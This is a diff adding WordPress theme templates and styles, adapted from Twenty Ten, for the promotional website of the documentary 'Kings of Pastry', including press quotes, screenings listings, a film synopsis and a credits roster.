+<?php /* Display navigation to next/previous pages when applicable  */ ?>
+<?php if ( $wp_query->max_num_pages > 1 ) : ?>
+	<div id="nav-above" class="navigation">
+		<div class="nav-previous"><?php next_posts_link( __( '<span class="meta-nav">&larr;</span> Older posts', 'twentyten' ) ); ?></div>
+		<div class="nav-next"><?php previous_posts_link( __( 'Newer posts <span class="meta-nav">&rarr;</span>', 'twentyten' ) ); ?></div>
+	</div><!-- #nav-above -->
+<?php endif; ?>
+
+<?php /* If there are no posts to display, such as an empty archive page  */ ?>
+<?php if ( ! have_posts() ) : ?>
+	<div id="post-0" class="post error404 not-found">
+		<h1 class="entry-title"><?php _e( 'Not Found', 'twentyten' ); ?></h1>
+		<div class="entry-content">
+			<p><?php _e( 'Apologies, but no results were found for the requested Archive. Perhaps searching will help find a related post.', 'twentyten' ); ?></p>
+			<?php get_search_form(); ?>
+		</div><!-- .entry-content -->
+	</div><!-- #post-0 -->
+<?php endif; ?>
+
+<?php /* Start the Loop  */ ?>
+<?php while ( have_posts() ) : the_post(); ?>
+
+<?php /* How to Display posts in the Gallery Category  */ ?>
+	<?php if ( in_category( 'Gallery' ) ) : ?>
+		<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+			<h2 class="entry-title"><a href="<?php the_permalink(); ?>" title="<?php printf( esc_attr__( 'Permalink to %s', 'twentyten' ), the_title_attribute( 'echo=0' ) ); ?>" rel="bookmark"><?php the_title(); ?></a></h2>
+
+			<div class="entry-meta">
+				<?php
+					printf( __( '<span class="meta-prep meta-prep-author">Posted on </span><a href="%1$s" title="%2$s" rel="bookmark"><span class="entry-date">%3$s</span></a> <span class="meta-sep"> by </span> <span class="author vcard"><a class="url fn n" href="%4$s" title="%5$s">%6$s</a></span>', 'twentyten' ),
+						get_permalink(),
+						esc_attr( get_the_time() ),
+						get_the_date(),
+						get_author_posts_url( get_the_author_meta( 'ID' ) ),
+						sprintf( esc_attr__( 'View all posts by %s', 'twentyten' ), get_the_author() ),
+						get_the_author()
+					);
+				?>
+			</div><!-- .entry-meta -->
+
+			<div class="entry-content">
+				<div class="gallery-thumb">
+					<a class="size-thumbnail" href="<?php the_permalink(); ?>"><?php
+					$images = get_children( array( 'post_parent' => $post->ID, 'post_type' => 'attachment', 'post_mime_type' => 'image', 'orderby' => 'menu_order', 'order' => 'ASC', 'numberposts' => 999 ) );
+					$total_images = count( $images );
+					$image = array_shift( $images );
+					echo wp_get_attachment_image( $image->ID, 'thumbnail' );
+					?></a>
+				</div>
+				<p><em><?php printf( __( 'This gallery contains <a %1$s>%2$s photos</a>.', 'twentyten' ),
+						'href="' . get_permalink() . '" title="' . sprintf( esc_attr__( 'Permalink to %s', 'twentyten' ), the_title_attribute( 'echo=0' ) ) . '" rel="bookmark"',
+						$total_images
+					); ?></em></p>
+
+				<?php the_excerpt( '' ); ?>
+			</div><!-- .entry-content -->
+
+			<div class="entry-utility">
+				<?php
+					$category_id = get_cat_ID( 'Gallery' );
+					$category_link = get_category_link( $category_id );
+				?>
+				<a href="<?php echo $category_link; ?>" title="<?php esc_attr_e( 'View posts in the Gallery category', 'twentyten' ); ?>"><?php _e( 'More Galleries', 'twentyten' ); ?></a>
+				<span class="meta-sep"> | </span>
+				<span class="comments-link"><?php comments_popup_link( __( 'Leave a comment', 'twentyten' ), __( '1 Comment', 'twentyten' ), __( '% Comments', 'twentyten' ) ); ?></span>
+				<?php edit_post_link( __( 'Edit', 'twentyten' ), "<span class=\"meta-sep\">|</span>\n\t\t\t\t\t\t<span class=\"edit-link\">", "</span>\n\t\t\t\t\t\n" ); ?>
+			</div><!-- #entry-utility -->
+		</div>
+
+<?php /* How to display posts in the asides category */ ?>
+	<?php elseif ( in_category( 'asides' ) ) : ?>
+		<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+	<?php if ( is_archive() || is_search() ) : //Only display Excerpts for archives & search ?>
+			<div class="entry-summary">
+				<?php the_excerpt( __( 'Continue reading <span class="meta-nav">&rarr;</span>', 'twentyten' ) ); ?>
+			</div><!-- .entry-summary -->
+	<?php else : ?>
+			<div class="entry-content">
+				<?php the_content( __( 'Continue&nbsp;reading&nbsp;<span class="meta-nav">&rarr;</span>', 'twentyten' ) ); ?>
+			</div><!-- .entry-content -->
+	<?php endif; ?>
+
+			<div class="entry-utility">
+				<?php
+					printf( __( '<span class="meta-prep meta-prep-author">Posted on </span><a href="%1$s" title="%2$s" rel="bookmark"><span class="entry-date">%3$s</span></a> <span class="meta-sep"> by </span> <span class="author vcard"><a class="url fn n" href="%4$s" title="%5$s">%6$s</a></span>', 'twentyten' ),
+						get_permalink(),
+						esc_attr( get_the_time() ),
+						get_the_date(),
+						get_author_posts_url( get_the_author_meta( 'ID' ) ),
+						sprintf( esc_attr__( 'View all posts by %s', 'twentyten' ), get_the_author() ),
+						get_the_author()
+					);
+				?>
+				<span class="meta-sep"> | </span>
+				<span class="comments-link"><?php comments_popup_link( __( 'Leave a comment', 'twentyten' ), __( '1 Comment', 'twentyten' ), __( '% Comments', 'twentyten' ) ); ?></span>
+				<?php edit_post_link( __( 'Edit', 'twentyten' ), "<span class=\"meta-sep\">|</span>\n\t\t\t\t\t\t<span class=\"edit-link\">", "</span>\n\t\t\t\t\t\n" ); ?>
+			</div><!-- #entry-utility -->
+		</div><!-- #post-<?php the_ID(); ?> -->
+
+<?php /* How to display all other posts  */ ?>
+	<?php else : ?>
+		<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+			<h2 class="entry-title"><a href="<?php the_permalink(); ?>" title="<?php printf( esc_attr__( 'Permalink to %s', 'twentyten' ), the_title_attribute( 'echo=0' ) ); ?>" rel="bookmark"><?php the_title(); ?></a></h2>
+
+			<div class="entry-meta">
+				<?php
+					printf( __( '<span class="meta-prep meta-prep-author">Posted on </span><a href="%1$s" title="%2$s" rel="bookmark"><span class="entry-date">%3$s</span></a> <span class="meta-sep"> by </span> <span class="author vcard"><a class="url fn n" href="%4$s" title="%5$s">%6$s</a></span>', 'twentyten' ),
+						get_permalink(),
+						esc_attr( get_the_time() ),
+						get_the_date(),
+						get_author_posts_url( get_the_author_meta( 'ID' ) ),
+						sprintf( esc_attr__( 'View all posts by %s', 'twentyten' ), get_the_author() ),
+						get_the_author()
+					);
+				?>
+			</div><!-- .entry-meta -->
+
+	<?php if ( is_archive() || is_search() ) : //Only display Excerpts for archives & search ?>
+			<div class="entry-summary">
+				<?php the_excerpt( __( 'Continue reading <span class="meta-nav">&rarr;</span>', 'twentyten' ) ); ?>
+			</div><!-- .entry-summary -->
+	<?php else : ?>
+			<div class="entry-content">
+				<?php the_content( __( 'Continue&nbsp;reading&nbsp;<span class="meta-nav">&rarr;</span>', 'twentyten' ) ); ?>
+				<?php wp_link_pages( array( 'before' => '<div class="page-link">' . __( 'Pages:', 'twentyten' ), 'after' => '</div>' ) ); ?>
+			</div><!-- .entry-content -->
+	<?php endif; ?>
+
+			<div class="entry-utility">
+				<span class="cat-links"><span class="entry-utility-prep entry-utility-prep-cat-links"><?php echo twentyten_cat_list(); ?></span></span>
+				<span class="meta-sep"> | </span>
+				<?php $tags_text = twentyten_tag_list(); ?>
+				<?php if ( ! empty( $tags_text ) ) : ?>
+				<span class="tag-links"><span class="entry-utility-prep entry-utility-prep-tag-links"><?php echo $tags_text; ?></span></span>
+				<span class="meta-sep"> | </span>
+				<?php endif; //$tags_text ?>
+				<span class="comments-link"><?php comments_popup_link( __( 'Leave a comment', 'twentyten' ), __( '1 Comment', 'twentyten' ), __( '% Comments', 'twentyten' ) ); ?></span>
+				<?php edit_post_link( __( 'Edit', 'twentyten' ), "<span class=\"meta-sep\">|</span>\n\t\t\t\t\t\t<span class=\"edit-link\">", "</span>\n\t\t\t\t\t\n" ); ?>
+			</div><!-- #entry-utility -->
+		</div><!-- #post-<?php the_ID(); ?> -->
+
+		<?php comments_template( '', true ); ?>
+
+	<?php endif; // if different categories queried ?>
+<?php endwhile; ?>
+
+<?php /* Display navigation to next/previous pages when applicable  */ ?>
+<?php if (  $wp_query->max_num_pages > 1 ) : ?>
+				<div id="nav-below" class="navigation">
+					<div class="nav-previous"><?php next_posts_link( __( '<span class="meta-nav">&larr;</span> Older posts', 'twentyten' ) ); ?></div>
+					<div class="nav-next"><?php previous_posts_link( __( 'Newer posts <span class="meta-nav">&rarr;</span>', 'twentyten' ) ); ?></div>
+				</div><!-- #nav-below -->
+<?php endif; ?>

+ 37 - 0
news.php

@@ -0,0 +1,37 @@
+<?php
+/**
+ * Template Name: News
+ */
+?>
+
+<?php get_header(); ?>
+
+		<div id="container" class="onecolumn">
+			<div id="content">
+				<div class="hide">
+				<div class="entry-content">
+					<h3>News</h3>
+					<img src="<?php bloginfo( 'template_url' ); ?>/images/pastry-1.jpg" width="300"/><div class="separator"><img src="<?php bloginfo( 'template_url' ); ?>/images/separator_sb.png"/>
+						</div>
+					<?php query_posts('showposts=3&category_name=news'); ?>
+					<?php if (have_posts()) : ?><?php while (have_posts()) : the_post(); ?>
+						<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+						<h3><a href="<?php the_permalink() ?>"><?php the_title(); ?></a></h3>
+						<?php the_excerpt();?>
+						</div><!-- #post-<?php the_ID(); ?> -->
+					<?php endwhile; endif; ?>	
+					<h3><a href="<?php echo home_url( '/' ); ?>news">More News</a></h3>							
+				</div><!-- .entry-content -->
+				</div>
+				
+				<?php query_posts('showposts=21&category_name=news&offset=3'); ?>
+				<?php if (have_posts()) : ?><?php while (have_posts()) : the_post(); ?>
+					<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+					<h3><a href="<?php the_permalink() ?>"><?php the_title(); ?></a></h3>
+					<?php the_content();?>
+					</div><!-- #post-<?php the_ID(); ?> -->
+				<?php endwhile; endif; ?>
+			</div><!-- #content -->
+		</div><!-- #container -->
+<div class="clear"></div>
+<?php get_footer(); ?>

+ 35 - 0
onecolumn-page.php

@@ -0,0 +1,35 @@
+<?php
+/**
+ * Template Name: One column, no sidebar
+ *
+ * A custom page template without sidebar.
+ * Selectable from a dropdown menu on the edit page screen.
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+<?php get_header(); ?>
+
+		<div id="container" class="onecolumn">
+			<div id="content">
+
+<?php the_post(); ?>
+
+				<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+				
+					<div class="entry-content">
+						<?php the_content(); ?>
+						<?php wp_link_pages( array( 'before' => '<div class="page-link">' . __( 'Pages:', 'twentyten' ), 'after' => '</div>' ) ); ?>
+						<?php edit_post_link( __( 'Edit', 'twentyten' ), '<span class="edit-link">', '</span>' ); ?>
+					</div><!-- .entry-content -->
+				</div><!-- #post-<?php the_ID(); ?> -->
+
+				<?php comments_template( '', true ); ?>
+
+			</div><!-- #content -->
+		</div><!-- #container -->
+
+<?php get_footer(); ?>

+ 39 - 0
page.php

@@ -0,0 +1,39 @@
+<?php
+/**
+ * The template used to display all pages
+ *
+ * This is the template that displays all pages by default.
+ * Please note that this is the wordpress construct of pages
+ * and that other 'pages' on your wordpress site will use a
+ * different template.
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+<?php get_header(); ?>
+
+		<div id="container">
+			<div id="content">
+
+<?php the_post(); ?>
+
+				<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+							
+
+					<div class="entry-content">
+						<?php the_content(); ?>
+						<?php wp_link_pages( array( 'before' => '<div class="page-link">' . __( 'Pages:', 'twentyten' ), 'after' => '</div>' ) ); ?>
+						<?php edit_post_link( __( 'Edit', 'twentyten' ), '<span class="edit-link">', '</span>' ); ?>
+					</div><!-- .entry-content -->
+				</div><!-- #post-<?php the_ID(); ?> -->
+
+				<?php comments_template( '', true ); ?>
+
+			</div><!-- #content -->
+		</div><!-- #container -->
+
+<?php get_sidebar(); ?>
+<?php get_footer(); ?>

+ 37 - 0
press.php

@@ -0,0 +1,37 @@
+<?php
+/**
+ * Template Name: Press
+ */
+?>
+<?php get_header(); ?>
+		<div id="container" class="onecolumn">
+			<div id="content">
+				<?php the_post(); ?>
+				<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+					<div class="hide">
+						<div class="entry-content">
+							<h3>Press</h3>
+							<img src="<?php bloginfo( 'template_url' ); ?>/images/sculpture.jpg" width="300"/>
+							<p><a href="<?php bloginfo( 'template_url' ); ?>/docs/Kings_of_Pastry_pressbook.pdf"> Press Booklet</a> - <a href="http://www.flickr.com/photos/44309070@N07/"> Photos</a>
+							
+								<div class="separator"><img src="<?php bloginfo( 'template_url' ); ?>/images/separator_sb.png"/>
+									</div>			
+							<p>โ€œForget Masterchef. This is the culinary Hurt Locker.โ€<br />  <strong><em><a href="http://www.heraldscotland.com/arts-ents/film-tv-reviews/tv-food-docs-go-a-la-carte-1.1013805?localLinksEnabled=false">Herald Scotland</a></em></strong></p>
+							<p>โ€œGripping, even for non-foodies. Itโ€™s not revealing too much to say that a disaster precipitates some of the picโ€™s most affecting moments.โ€<br /> <strong><em><a href="http://www.variety.com/review/VE1117942326.html?categoryid=31&amp;cs=1">Variety</a></em></strong></p>
+							<p>โ€œThis is no MasterChef-style cook-offโ€ฆThe tension is almost unbearable.โ€<br /> <strong><em><a href="http://www.smh.com.au/news/entertainment/tv--radio/tv-reviews/tuesday-tv-survivor-samoa/2009/12/05/1259429501059.html">Sydney Morning Herald</a></em></strong></p>
+							<p>โ€œI never saw so many strong men sobbing at once.โ€<br />  <strong><em><a href="http://www.guardian.co.uk/tv-and-radio/2010/mar/19/lady-and-the-revamp-review">The Guardian</a></em></strong><a href="http://www.guardian.co.uk/tv-and-radio/2010/mar/19/lady-and-the-revamp-review"> </a></p>
+							<p>โ€œ[G]astroporn of the highest qualityโ€ฆthe last moments were as thrilling as any Olympic final. Who would have thought that the fate of a sugar sculpture could be heart-stopping? Exquisite.โ€<br /><strong><em><a href="http://www.independent.co.uk/arts-entertainment/tv/reviews/last-nights-television-masterchef-bbc1brkings-of-pastry-bbc4brthe-lady-and-the-revamp-channel-4-1923527.html">The Independent</a></em></strong></p>
+							<p>โ€œleaves viewers on the edge of their seats.โ€  <br /><strong><em><a href="http://www.latimes.com/news/nation-and-world/la-fg-france-pastry7-2010mar07,0,1973156.story">The LA Times</a></em></strong></p>
+							<p></em></p>
+							<br />
+							<h3><a href="<?php echo home_url( '/' ); ?>press">Read More...</a></h3>
+						</div><!-- .entry-content -->
+					</div>
+					<p><a href="<?php bloginfo( 'template_url' ); ?>/docs/Kings_of_Pastry_pressbook.pdf"><img src="<?php bloginfo( 'template_url' ); ?>/images/acrobat.png"/> Press Booklet</a> - <a href="http://www.flickr.com/photos/44309070@N07/"> Photos</a></p>
+					<div class="separator"><img src="<?php bloginfo( 'template_url' ); ?>/images/separator_sb.png"/>
+						</div>
+					<?php the_content(); ?>
+				</div><!-- #post-<?php the_ID(); ?> -->
+			</div><!-- #content -->
+		</div><!-- #container -->
+<?php get_footer(); ?>

+ 286 - 0
rtl.css

@@ -0,0 +1,286 @@
+/*
+Theme Name: Twenty Ten
+*/
+
+
+/* --------------------------------------------------------------
+
+   RTL Basics
+
+-------------------------------------------------------------- */
+
+
+body {
+	direction:rtl;
+	unicode-bidi:embed;
+}
+
+
+/*
+LAYOUT: Two-Column (Right)
+DESCRIPTION: Two-column fixed layout with one sidebar right of content
+*/
+
+#container {
+	float: right;
+	margin: 0 0 0 -240px;
+}
+#content {
+	margin: 0 20px 0 280px;
+}
+#primary,
+#secondary {
+	float: left;
+}
+#secondary {
+	clear: left;
+}
+
+
+/* =Fonts
+-------------------------------------------------------------- */
+body,
+input,
+textarea,
+.page-title span {
+	font-family: Georgia, "Bitstream Charter", serif;
+}
+
+h3#comments-title,
+h3#reply-title,
+#access .menu,
+#cancel-comment-reply-link,
+#form-allowed-tags,
+#site-info,
+#site-title,
+#wp-calendar,
+.comment-meta,
+.comment-body tr th,
+.comment-body thead th,
+.entry-content label,
+.entry-content tr th,
+.entry-content thead th,
+.entry-meta,
+.entry-title,
+.entry-utility,
+.form-label,
+.navigation,
+.page-title,
+.pingback p,
+.reply,
+.widget-title
+{
+	font-family: "Helvetica Neue", Helvetica, Arial, "Nimbus Sans L", sans-serif;
+}
+
+pre {
+	font-family: "Courier 10 Pitch", Courier, monospace;
+}
+
+code {
+	font-family: Consolas, Monaco, "Andale Mono", "DejaVu Sans Mono", monospace;
+}
+
+/* =Structure
+-------------------------------------------------------------- */
+
+/* The main theme structure */
+#footer-widget-area .widget-area {
+	float: right;
+	margin-left: 20px;
+	margin-right: 0;
+}
+#footer-widget-area #fourth {
+	margin-left: 0;
+}
+#site-info {
+	float: right;
+}
+#site-generator {
+	float: left;
+}
+
+
+/* =Global Elements
+-------------------------------------------------------------- */
+
+/* Text elements */
+ul {
+	list-style: square;
+	margin: 0 1.5em 18px 0;
+}
+blockquote {
+	font-style: normal;
+}
+
+/* Text meant only for screen readers */
+.screen-reader-text {
+	left: auto;
+	text-indent:-9000px;
+}
+
+
+/* =Header
+-------------------------------------------------------------- */
+
+#site-title {
+	float: right;
+}
+#site-description {
+	clear: left;
+	float: left;
+}
+
+/* =Menu
+-------------------------------------------------------------- */
+
+#access {
+	float:right;
+}
+
+#access .menu {
+    margin-right: 12px;
+    margin-left: 0;
+}
+
+
+#access .menu li {
+	float:right;
+}
+
+#access ul ul {
+	left:auto;
+	right:0;
+	float:right;
+}
+#access ul ul ul {
+	left:auto;
+	right:100%;
+}
+
+/* =Content
+-------------------------------------------------------------- */
+
+#content table {
+	text-align: right;
+	margin: 0 0 24px -1px;
+}
+.entry-title,
+.entry-meta {
+	clear: right;
+	float: right;
+	margin-left: 68px;
+	margin-right: 0;
+}
+
+.entry-content input.file,
+.entry-content input.button {
+	margin-left: 24px;
+	margin-right:0;
+}
+.entry-content blockquote.left {
+	float: right;
+	margin-right: 0;
+	margin-left: 24px;
+	text-align: left;
+}
+.entry-content blockquote.right {
+	float: left;
+	margin-right: 24px;
+	margin-left: 0;
+	text-align: right;
+}
+#entry-author-info #author-avatar {
+	float: right;
+	margin: 0 0 0 -104px;
+}
+#entry-author-info #author-description {
+	float: right;
+	margin: 0 104px 0 0;
+}
+
+/* Gallery listing
+-------------------------------------------------------------- */
+
+.category-gallery .gallery-thumb {
+	float: right;
+ 	margin-left:20px;
+	margin-right:0;
+}
+#content .gallery .gallery-item {
+	float: right;
+}
+
+/* =Images
+-------------------------------------------------------------- */
+
+#content .gallery .gallery-caption {
+	margin-right: 0;
+}
+
+
+/* =Navigation
+-------------------------------------------------------------- */
+.nav-previous {
+	float: right;
+}
+.nav-next {
+	float: left;
+	text-align:left;
+}
+
+/* =Comments
+-------------------------------------------------------------- */
+
+.commentlist li.comment {
+	padding: 0 56px 0 0;
+}
+.commentlist .avatar {
+	right: 0;
+	left: auto;
+}
+.comment-author .says {
+	font-style: normal;
+}
+
+/* Comments form */
+.children #respond {
+	margin: 0 0 0 48px;
+}
+
+/* =Widget Areas
+-------------------------------------------------------------- */
+
+.widget-area ul {
+	margin-right: 0;
+}
+.widget-area ul ul {
+	margin-right: 1.3em;
+	margin-left: 0;
+}
+#wp-calendar caption {
+	text-align: right;
+}
+#wp-calendar tfoot #next {
+	text-align: left;
+}
+/* Main sidebars */
+#main .widget-area ul {
+	margin-right: 0;
+	padding: 0 0 0 20px;
+}
+#main .widget-area ul ul {
+	margin-right: 1.3em;
+	margin-left: 0;
+}
+
+/* =Footer
+-------------------------------------------------------------- */
+
+#site-generator a {
+	background-position: right center;
+	padding-right: 19px;
+	padding-left: 0;
+	margin-right: 1px;
+	margin-left: 0;
+}

+ 44 - 0
screenings.php

@@ -0,0 +1,44 @@
+<?php
+/**
+ * Template Name: Screenings
+ */
+?>
+<?php get_header(); ?>
+
+		<div id="container" class="onecolumn">
+			<div id="content">
+				<div class="hide">
+				<div class="entry-content">
+					<h3>Screenings</h3>
+					<img src="<?php bloginfo( 'template_url' ); ?>/images/screenings.jpg" width="300"/>
+					<h3><a href="<?php echo home_url( '/' ); ?>theatricalpremiere">THEATRICAL PREMIERE</h3>
+					<p>Film Forum, NYC<br />
+					September 15, 2010</p>
+
+					<div class="separator"><img src="<?php bloginfo( 'template_url' ); ?>/images/separator_sb.png"/>
+						</div>
+					<?php query_posts('showposts=7&order=asc&category_name=screenings&offset=1'); ?>
+					<?php if (have_posts()) : ?><?php while (have_posts()) : the_post(); if( $post->ID == '189' ) continue; ?>
+						<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+						<h3><a href="<?php echo home_url( '/' ); ?>screenings"><?php the_title(); ?></a></h3>
+						<?php the_excerpt();?>
+						</div><!-- #post-<?php the_ID(); ?> -->
+					<?php endwhile; endif; ?>	
+					<h3><a href="<?php echo home_url( '/' ); ?>screenings">See More</a></h3>						
+				</div><!-- .entry-content -->
+				</div>
+				<?php query_posts('category_name=screenings&order=asc&posts_per_page=-1'); ?>
+				<?php if (have_posts()) : ?><?php while (have_posts()) : the_post(); ?>
+					<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+					<h3><?php the_title(); ?></h3>
+					<div class="excerpt"><?php the_excerpt();?></div>
+					<?php the_content();?>
+					</div><!-- #post-<?php the_ID(); ?> -->
+				<?php endwhile; endif; ?>
+				
+				<p><a href="<?php echo home_url( '/' ); ?>festivals/"> - Previous Festivals</a></p>
+				
+			</div><!-- #content -->
+		</div><!-- #container -->
+<div class="clear"></div>
+<?php get_footer(); ?>

BIN
screenshot.png


+ 38 - 0
search.php

@@ -0,0 +1,38 @@
+<?php
+/**
+ * The Search Results template
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+<?php get_header(); ?>
+
+		<div id="container">
+			<div id="content">
+
+<?php if ( have_posts() ) : ?>
+				<h1 class="page-title"><?php printf( __( 'Search Results for: %s', 'twentyten' ), '<span>' . get_search_query() . '</span>' ); ?></h1>
+				<?php
+				/* Run the loop for the search to output the results.
+				 * If you want to overload this in a child theme then include a file
+				 * called loop-search.php and that will be used instead.
+				 */
+				 get_template_part( 'loop', 'search' );
+				?>
+<?php else : ?>
+				<div id="post-0" class="post no-results not-found">
+					<h2 class="entry-title"><?php _e( 'Nothing Found', 'twentyten' ); ?></h2>
+					<div class="entry-content">
+						<p><?php _e( 'Sorry, but nothing matched your search criteria. Please try again with some different keywords.', 'twentyten' ); ?></p>
+						<?php get_search_form(); ?>
+					</div><!-- .entry-content -->
+				</div>
+<?php endif; ?>
+			</div><!-- #content -->
+		</div><!-- #container -->
+
+<?php get_sidebar(); ?>
+<?php get_footer(); ?>

+ 20 - 0
searchform.php

@@ -0,0 +1,20 @@
+<?php
+/**
+ * The Search Form
+ *
+ * Optional file that allows displaying a custom search form
+ * when the get_search_form() template tag is used.
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+    <form id="searchform" name="searchform" method="get" action="<?php echo home_url(); ?>">
+		<div>
+			<label for="s"><?php _e( 'Search', 'twentyten' ); ?></label>
+			<input type="text" id="s" name="s" />
+			<input type="submit" id="searchsubmit" value="<?php esc_attr_e( 'Search', 'twentyten' ); ?>" />
+		</div>
+    </form>

+ 53 - 0
sidebar-footer.php

@@ -0,0 +1,53 @@
+<?php
+/**
+ * The Footer widget areas
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+<?php
+	if (
+		is_active_sidebar( 'first-footer-widget-area' )  ||
+		is_active_sidebar( 'second-footer-widget-area' ) ||
+		is_active_sidebar( 'third-footer-widget-area' )  ||
+		is_active_sidebar( 'fourth-footer-widget-area' )
+	) :
+?>
+			<div id="footer-widget-area">
+<?php if ( is_active_sidebar( 'first-footer-widget-area' ) ) : ?>
+					<div id="first" class="widget-area">
+						<ul class="xoxo">
+							<?php dynamic_sidebar( 'first-footer-widget-area' ); ?>
+						</ul>
+					</div><!-- #first .widget-area -->
+<?php endif; ?>
+
+<?php if ( is_active_sidebar( 'second-footer-widget-area' ) ) : ?>
+				<div id="second" class="widget-area">
+					<ul class="xoxo">
+						<?php dynamic_sidebar( 'second-footer-widget-area' ); ?>
+					</ul>
+				</div><!-- #second .widget-area -->
+<?php endif; ?>
+
+<?php if ( is_active_sidebar( 'third-footer-widget-area' ) ) : ?>
+				<div id="third" class="widget-area">
+					<ul class="xoxo">
+						<?php dynamic_sidebar( 'third-footer-widget-area' ); ?>
+					</ul>
+				</div><!-- #third .widget-area -->
+<?php endif; ?>
+
+<?php if ( is_active_sidebar( 'fourth-footer-widget-area' ) ) : ?>
+				<div id="fourth" class="widget-area">
+					<ul class="xoxo">
+						<?php dynamic_sidebar( 'fourth-footer-widget-area' ); ?>
+					</ul>
+				</div><!-- #fourth .widget-area -->
+<?php endif; ?>
+
+			</div><!-- #footer-widget-area -->
+<?php endif; ?>

+ 17 - 0
sidebar-home.php

@@ -0,0 +1,17 @@
+
+<script type="text/javascript" src="<?php bloginfo( 'template_url' ); ?>/js/init.js"></script>
+
+<div id="sidebar_home">
+	<h3 align="center"><a href="http://firstrunfeatures.com/cgi-bin/sc/ref.cgi?storeid=*0e95b5db0e6b1500be&name=FM_Kings_of_Pastry"><img src="<?php bloginfo( 'template_url' ); ?>/images/dvd_button.jpg" width="130"></a></h3> 
+	<h3 align="center"><a href="http://firstrunfeatures.com/cgi-bin/sc/ref.cgi?storeid=*0e95b5db0e6b1500be&name=FM_Kings_of_Pastry">Purchase the DVD</a></h3>
+	<h3 align="center"><a href="vod">Video on Demand</a></h3> 
+	<p></p>
+	<div class="separator"><img src="<?php bloginfo( 'template_url' ); ?>/images/separator_sb.png"/>
+		</div>
+	<p></p>
+	
+	<p><b>Imagine a scene never before witnessed:</b> Sixteen French pastry chefs gathered in Lyon for three intense days of mixing, piping and sculpting everything from delicate chocolates to six-foot sugar sculptures in hopes of being declared by President Nicolas Sarkozy one of the best. This is the prestigious Meilleurs Ouvriers de France competition (Best Craftsmen in France). The blue, white and red striped collar worn <br />on the jackets of the winners is more than the <br />ultimate recognition for every pastry chef โ€“ <br /> <i>it is a dream and an obsession.</i></p>
+	<p>&nbsp;&nbsp;&nbsp;Filmmakers D A Pennebaker and Chris Hegedus secured exclusive access to shoot this epic, never-before-filmed test of Franceโ€™s finest artisans. The film follows chef Jacquy Pfeiffer, co-founder of Chicagoโ€™s French Pastry School, as he journeys back to his childhood home of Alsace to practice for the contest. Two other finalists are profiled in the film โ€” chef Regis Lazard, who was competing for the second time (he dropped his sugar sculpture the first time), and chef Philippe Rigollot, from Maison Pic, Franceโ€™s only three-star restaurant owned by a woman. </p>
+		<p>&nbsp;&nbsp;&nbsp;During the grueling final competition, chefs work under constant scrutiny by master judges and the critical palates of some of the worldโ€™s most renowned chefs evaluate their elaborate pastries. Finally, these pastry marathoners racing the clock must hand carry all their creations including their fragile sugar sculptures through a series of rooms to a final buffet area without shattering them. The film captures the high-stakes drama of the competition โ€“ passion, sacrifice, disappointment, and joy โ€“ in the quest to become one of the <b>KINGS OF PASTRY.</b></p>
+	</div>
+

+ 127 - 0
sidebar-team.php

@@ -0,0 +1,127 @@
+	<div class="roster2">
+	<p>Directed by</p>
+	<p>Chris Hegedus</p>
+	<p>D A Pennebaker</p>
+	<br />
+	<p>Executive Producers</p>
+	<p>Frazer Pennebaker for Pennebaker Hegedus Films</p>
+	<p>Nick Fraser for BBC</p>
+	<p>Barbara Truyen for VPRO</p>
+	<br />
+	<p>Produced by</p>
+	<p>Frazer Pennebaker</p>
+	<p>Flora Lazar</p>
+		<br />
+	<p>Associate Producers</p>
+	<p>Rebecca Lando</p>
+	<p>Patricia Soussloff</p>
+		<br />
+	<p>Camera and Sound by</p>
+	<p>Chris Hegedus</p>
+	<p>D A Pennebaker</p>
+	<p>Nick Doob</p>
+	<br />
+	<p>Edited by</p>
+	<p>Chris Hegedus</p>
+	<p>D A Pennebaker</p>
+	<br />
+	<p>Featuring</p>
+	<p>Sebastien Canonne, M.O.F.</p>
+	<p>Jacquy Pfeiffer</p>
+	<p>Rachel Beaudry</p>
+	<p>Philippe Rigollot</p>
+	<p>Stephane Glacier, M.O.F.</p>
+	<p>Regis Lazard</p>
+	<p>Frederique Lazard</p>
+	<p>Philippe Urraca, MOF</p>
+	<br />
+	<p>Musicians</p>
+	<p>Alex Toledano, Music Supervisor</p>
+	<p>Sebastien Gineux</p>
+	<p>Guillaume Singer</p>
+	<p>Jeremie Arranger</p>
+	<p>Corentin Gineaux</p>
+	
+	<br />
+	</p>and</p>
+	<p>President Nicolas Sarkozy</p>
+	<p>Gerard Cayotte</p>
+	<p>Chef Regis Ferey</p>
+	<p>Kurt Fogle</p>
+	<p>Chef Bob Hartwig</p>
+	<p>Franck Kestener, M.O.F.</p>
+	<p>Gabrielle Montalbano</p>
+	<p>Hailey Montalbano</p>
+	<p>Alex Pfeiffer</p>
+	<p>Donald Wressell</p>
+	<p>Pierre Zimmermann</p>
+	<p>Zimmermann Family</p>
+<br />
+	<p>M.O.F. Finalists</p>
+	<p>Thierry Bamas</p>
+	<p>Yann Brys</p>
+	<p>David Capy</p>
+	<p>Laurent Cordonnier</p>
+	<p>Franck Cosyns</p>
+	<p>Laurent Kieny</p>
+	<p>Arnaud Larher</p>
+	<p>Regis Lazard</p>
+	<p>Angelo Musa</p>
+	<p>Jacquy Pfeiffer</p>
+	<p>Laurent Piballeau</p>
+	<p>Jean-Philippe Rambaud</p>
+	<p>Christophe Rhedon</p>
+	<p>Philippe Rigollot</p>
+	<p>Dominique Sabatie</p>
+	<p>Jean-Marc Touya</p>
+<br />
+	<p>Effects & Title Graphics</p>
+	<p>Rebecca Lando</p>
+	<p>Kit Pennebaker</p>
+<br />
